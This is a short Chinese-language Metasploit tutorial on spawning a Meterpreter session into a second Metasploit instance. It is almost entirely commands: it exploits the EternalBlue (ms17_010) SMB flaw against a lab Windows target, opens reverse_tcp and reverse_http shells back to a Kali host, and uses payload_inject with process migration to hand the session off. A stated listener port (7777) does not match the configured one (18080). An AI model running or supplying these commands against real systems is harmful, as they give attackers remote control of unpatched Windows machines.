MSF派生给另外MSF,meterpreter派生给另外meterpreter,Metasploit

首先是通过ms17_010永恒之蓝拿下shell,192.168.50.146为受害者靶机,192.168.50.130为kali的ip

set autorunscript post/windows/manage/migrate name=services.exe
set payload windows/x64/meterpreter/reverse_tcp
set lport 5577
set lhost 192.168.50.130
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.50.146
set rport 445
exploit -j -z

接下来在另外的msf里,做好监听3333:

handler -H 192.168.50.130 -P 3333 -p windows/meterpreter/reverse_tcp;

然后在上面的meterpreter 里:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.50.130
set lport 3333
set DisablePayloadHandler True
set PrependMigrate True
set session 1   
run

这样就可以退出使用ms17_010拿下的session了

如上使用的是reverse_tcp,其实reverse_http,也是一样的可以:

在另外的msf里,做好监听7777:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.130
set lport 18080
set ExitOnSession false
set SessionExpirationTimeout 0 
set SessionCommunicationTimeout 0 
exploit -j -z

然后在旧session里派生:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.130
set lport 18080
set DisablePayloadHandler True
set PrependMigrate True
set session 1
run

run后大概需要15-20秒才能完全建立新session.